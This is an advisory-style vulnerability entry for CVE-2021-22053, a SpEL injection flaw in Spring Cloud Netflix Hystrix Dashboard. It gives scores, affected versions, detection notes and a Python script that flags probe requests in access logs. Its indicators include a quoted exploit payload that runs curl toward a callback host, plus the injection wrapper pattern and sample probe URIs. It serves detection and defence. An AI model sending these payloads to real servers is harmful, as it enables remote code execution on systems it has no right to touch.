CVE-2021-22053
published 2021-11-19


Priority: P1 (82) · Severity: high · CVSS 3.1 base score: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ITW / Exploit / VulnCheck KEV: Exploited in the wild
EPSS: 12.69% (95.8th percentile)
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.

Affected (2 ranges)

Vendor   Product               Version range        Fixed in
vmware   spring_cloud_netflix  (unspecified)        -
vmware   spring_cloud_netflix  >= 2.2.0, < 2.2.10   2.2.10

Detection & IOCs (extracted from sources)

URL: /hystrix/monitor;[user-provided data]
Command: T(java.lang.Runtime).getRuntime().exec("curl http://{{interactsh-url}}")
  • Detect HTTP GET requests targeting the /hystrix/ path with semicolon-delimited path parameters containing SpringEL expression syntax (e.g., `__${...}__::.x/`), which is the exploitation pattern for CVE-2021-22053.
  • Monitor for out-of-band HTTP callbacks (e.g., via interactsh/canary tokens) triggered by curl or CertUtil user-agents, as the PoC payload exfiltrates via DNS/HTTP interaction.
  • Flag requests where the URI path contains the pattern `;a=a/__${` followed by `}__::.x/`, as this is the specific SpEL injection wrapper used in exploitation of this CVE.
  • Exploitation requires BOTH spring-cloud-netflix-hystrix-dashboard AND spring-boot-starter-thymeleaf to be present in the application; neither alone is sufficient.
  • The vulnerability affects Spring Cloud Netflix Hystrix Dashboard versions prior to 2.2.10 only; patched versions are not susceptible.
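The first and third detection notes above describe a log-side check: a request under /hystrix/ whose path carries a semicolon path parameter followed by SpEL/Thymeleaf expression syntax, with `;a=a/__${...}__::.x/` as the known wrapper. The script below is an added example written for this page, not code from the advisory or from any of the linked sources. It runs that check over a handful of constructed access-log lines (a simplified combined-log format with status and user agent; the client addresses and timestamps are invented), percent-decoding the request target first so that an encoded probe is matched the same way as a plain one. The regexes, field names and the toy expression `7*7` are this example's own choices, not identifiers taken from the page.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the advisory). Line 3 is the same
# probe as line 2 with the path percent-encoded; lines 1, 4 and 5 are
# negatives: a normal dashboard request, a legitimate ;jsessionid path
# parameter, and an expression on a path the dashboard does not serve.
SAMPLE_LOGS = [
    '10.0.0.5 - - [19/Nov/2021:10:01:02 +0000] "GET /hystrix/monitor?stream=http%3A%2F%2Fapp%3A8080%2Factuator%2Fhystrix.stream HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [19/Nov/2021:10:01:09 +0000] "GET /hystrix/monitor;a=a/__${7*7}__::.x/ HTTP/1.1" 500 "python-requests/2.26"',
    '10.0.0.9 - - [19/Nov/2021:10:01:15 +0000] "GET /hystrix/monitor%3Ba%3Da/__%24%7B7*7%7D__%3A%3A.x/ HTTP/1.1" 500 "curl/7.68.0"',
    '10.0.0.3 - - [19/Nov/2021:10:02:00 +0000] "GET /hystrix/monitor;jsessionid=abc123 HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.4 - - [19/Nov/2021:10:02:30 +0000] "GET /api/items;filter=__${x}__::.x/ HTTP/1.1" 404 "Mozilla/5.0"',
]

# Request line, status and user agent from the simplified log format used above.
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) "(?P<ua>[^"]*)"'
)

# The exact wrapper named in the detection notes: ;a=a/__${ ... }__::.x/
WRAPPER_RE = re.compile(r';a=a/__\$\{.*?\}__::\.x/')


def decode_path(target, rounds=3):
    """Return the path part of a request target, percent-decoded until stable.

    Bounded to a few rounds so double-encoded probes (%2524 -> %24 -> $)
    normalise to the same string as a plain one without looping forever.
    """
    path = target.split('?', 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_path(path):
    """List the indicators present in an already-decoded request path."""
    indicators = []
    if path.startswith('/hystrix/') and ';' in path:
        indicators.append('hystrix_path_parameter')
    if '${' in path:
        indicators.append('spel_delimiter')
    if WRAPPER_RE.search(path):
        indicators.append('known_spel_wrapper')
    return indicators


def detect(lines):
    """Return one alert per log line that matches the CVE-2021-22053 pattern.

    An alert needs both conditions from the advisory: a semicolon path
    parameter under /hystrix/ and SpEL expression syntax in the same path.
    The wrapper indicator is recorded when present but is not required, so a
    variant that changes the parameter name is still caught.
    """
    alerts = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = decode_path(match['target'])
        indicators = classify_path(path)
        if 'hystrix_path_parameter' in indicators and 'spel_delimiter' in indicators:
            alerts.append({
                'line': number,
                'client': line.split(' ', 1)[0],
                'path': path,
                'status': int(match['status']),
                'user_agent': match['ua'],
                'indicators': indicators,
            })
    return alerts


if __name__ == '__main__':
    for alert in detect(SAMPLE_LOGS):
        print(f"line {alert['line']}: {alert['client']} {alert['path']} "
              f"status={alert['status']} ua={alert['user_agent']!r} "
              f"indicators={alert['indicators']}")
```

Decoding before matching is the part most often skipped in a quick grep rule; a rule that looks for the literal `;a=a/__${` misses the percent-encoded form on line 3 even though the server decodes it identically. The jsessionid line shows why the check needs the expression delimiter and not just a semicolon: path parameters are legitimate Servlet syntax and appear in normal traffic.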

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     8.8    HIGH      CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     6.5    MEDIUM    AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck  -        8.8    HIGH      -